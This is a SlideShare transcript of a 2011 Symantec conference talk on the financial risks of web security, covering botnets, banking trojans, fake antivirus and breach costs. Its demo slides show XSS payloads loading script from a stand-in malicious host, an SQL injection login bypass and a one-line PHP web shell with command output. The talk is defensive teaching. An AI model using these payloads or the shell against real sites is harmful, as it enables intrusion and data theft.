Your SlideShare is downloading. ×
Financial Risks to Internet Security
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Introducing the official SlideShare app

Stunning, full-screen experience for iPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Financial Risks to Internet Security

564
views

Published on

Martin Lee CISSP CEng and Dr. Les Pritchard CITP discuss the Costs and Financial Risks of Web Security at Symantec Vision 2011

Martin Lee CISSP CEng and Dr. Les Pritchard CITP discuss the Costs and Financial Risks of Web Security at Symantec Vision 2011

Published in: Technology

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
564
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
21
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Costs and Financial Risks of Web Security Martin Lee CISSP CEng Dr. Les Pritchard CITPSR B03 - Costs and Financial Risks of Web Security 1
  • 2. Where the Threats Come From. Insider threats Mostly accidental data deletion. Acts of God Fire, flood, volcanos! Malicious outsiders Malware, banking trojans. (cybercriminals)SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 2
  • 3. How the Bad Guys Make MoneySR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 3
  • 4. Anyone’s Computer or Your Computer? Compromising any computer.Botnets Denial of service attacks. Send spam. Steal data. Compromising any computer.Banking trojans Internet bank robbery. Compromising specific systems.Targeted attacks Stealing high value data.SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 4
  • 5. Making Money From Botnets – Sending Spam Traffic analysis of rogue website 26 days, 350 million spams, 28 sales But, when scaled up ~$7000 in sales per day ~$2M per yearSource :C. Kanich et al. “Spamalytics: An Empirical Analysis of Spam Marketing Conversion”. Nov 2008(http://www.icsi.berkeley.edu/pubs/networking/2008-ccs-spamalytics.pdf) SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 5
  • 6. Making Money From Botnets – Denial of ServiceCan hit 100Gb/sec attack traffic.Estimated UK losses $3bn/yr.SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 6
  • 7. Making Money From Banking TrojansSource : http://www.wired.com/threatlevel/2010/10/zeus-ukraine-arrests/ SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 7
  • 8. Banking Trojans – Zeus Man-in-Browser AttackMalware waits for log in to internet banking,issues payments on your behalf to money mules.SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 8
  • 9. Banking Trojans – Zeus Man-in-Browser Attack Malware intercepts data sent from bank, removes it’s transfers, adjusts balance, shows you what you expect to see.SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 9
  • 10. Distributing Web Malware Gumblar Lifecycle CONTROLS FORWARDSUploading web malware to your website XSS MALWAREby stealing your login details. HACKER EXPLOIT HOST ADDS XSS EXPLOIT VISITS STEALS LOGIN INSTALLS UNAFECTED MALWARE WEBSITE VICTIMSR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 10
  • 11. Malware on Legitimate DomainsMalicious domains lifecycle: % remaining active over time100% Over time more than 80% of malicious domains are “Old” domains 80% “Old” domains 60% 80% 40% “New” Domains 20% 0% 0 30 60 90 120 150 180 Days SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 11
  • 12. Employee Browsing HabitsSR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 12
  • 13. Browsing Habits Outside of the Office 100 % of web blocks 80 60 Mobile 40 Office 20 0 20 40 60 80 100 % of usersSR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 13
  • 14. Distributing Web Malware – Advertising ServicesSubvert a legitimate website WEB PAGE Sold by sales team advertiser Sold by reseller advertiser Malware resold further distributor Adverts SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011
  • 15. Fake AVSR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011
  • 16. Fake AV Do the maths – 1 million products sold @$39.95 $8.2 million fine = $31.75 million profit!Source: http://www.pcworld.com/businesscenter/article/217987/alleged_scareware_vendors_to_pay_82_million_to_ftc.html SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011
  • 17. Attacking Your WebsiteSR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 17
  • 18. My Website – XSS Example www.example.com/index.php?page=cat&category=1&PHPSESSID=SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 18
  • 19. My Website – XSS Example Attack JS – "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> URL encode it, replace ‘category’ value www.example.com/index.php?page=cat&category=1&PHPSESSID= becomes www.example.com/index.php?page=cat&category=%3E%0A%3C%53%43%52%49SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 19
  • 20. My Website – XSS Example Attacker can execute whatever they like: Exploit – <script src=“http://www.malicious.com/attack.js”> Redirect – window.location.href = “http://www.malicious.com/“ Why not? – document.product.price = “0.01”SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 20
  • 21. XSS Example – Click that linkEmail containing link WEB PAGEEmbed link in discussion page ENTER TEXT SUBMIT I agree. <img src=“/images/smiley.gif” onload=“document.location=‘http://malicious/’”> SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 21
  • 22. SQL Injection – “Little Bobby Tables”Source: XKCD Comic - http://xkcd.com/327/ SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 22
  • 23. My Website – SQL Injection Example SQL injection:Select * from users where username = “$input” and password=md5($password);$input = ‘ admin”; -- ‘Select * from users where username = “admin”; -- ... ignored SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 23
  • 24. My Website – SQL Injection Example How about a file like this? <? system($_REQUEST*‘cmd’+); ?>SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 24
  • 25. My Website – Now completely at mercy of attackerhttp://www.example.com/images/shell.php?cmd=%6C%73%20%2D%6C ls -l -> %6C%73%20%2D%6C total 36 -rw-rw-r-- 1 martin martin 191 Nov 27 2003 categories.php drwxrwxr-x 2 martin martin 4096 Mar 16 17:53 inc -rw-rw-r-- 1 martin martin 543 Mar 29 14:54 index.old -rw-r--r-- 1 martin martin 124 Mar 29 15:03 index.php -rw-rw-r-- 1 martin martin 537 Mar 29 14:41 index.php~ -rw-rw-r-- 1 martin martin 2068 Mar 29 16:20 product_image.php -rw-rw-r-- 1 martin martin 1924 Nov 28 2003 product_image.php~ -rw-rw-r-- 1 martin martin 189 Nov 27 2003 products.php -rw-r--r-- 1 martin martin 31 Mar 29 15:04 shell.phpSR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 25
  • 26. Vulnerable Websites Skilled attackers can easily find vulnerabilities. Others can use a list of vulnerable websites.SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 26
  • 27. How You Lose MoneySR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 27
  • 28. Data Breach Losses • Ponemon Institute & Symantec Research – Average cost per data breach $7.2 million. – $214 per breached record. – 31% of breaches are malicious or criminal attack. – Malicious attacks cost more $318 per breached record.See: http://www.symantec.com/about/news/release/article.jsp?prid=20110308_01Calculate your risk: http://databreachcalculator.com/ SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 28
  • 29. Symantec SMB Survey – What do SMBs suffer? 60% Environment downtime 50% Corporate data theft 40% Customer or employee 30% PI theft Customer financial 20% information theft Intellectual property 10% theft 0%SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 29
  • 30. Protecting Yourself.SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 30
  • 31. Know Your Assets, Know Attack VectorsSR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 31
  • 32. Layers of Protection Provide Maximum DetectionSR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 32
  • 33. Test & Monitor Your Web Services Find & fix vulnerabilities in your web services. Monitor logs to identify attacks, block attacker. You don’t need to be perfect, just better than your competitors.SR B03 - Costs and Financial Risks of Web Security SYMANTEC VISION 2011 33
  • 34. Thank you! Martin Lee Martin_lee@symantec.com +44 1452 627 042 Copyright © 2011 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners. This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.SR B03 - Costs and Financial Risks of Web Security 34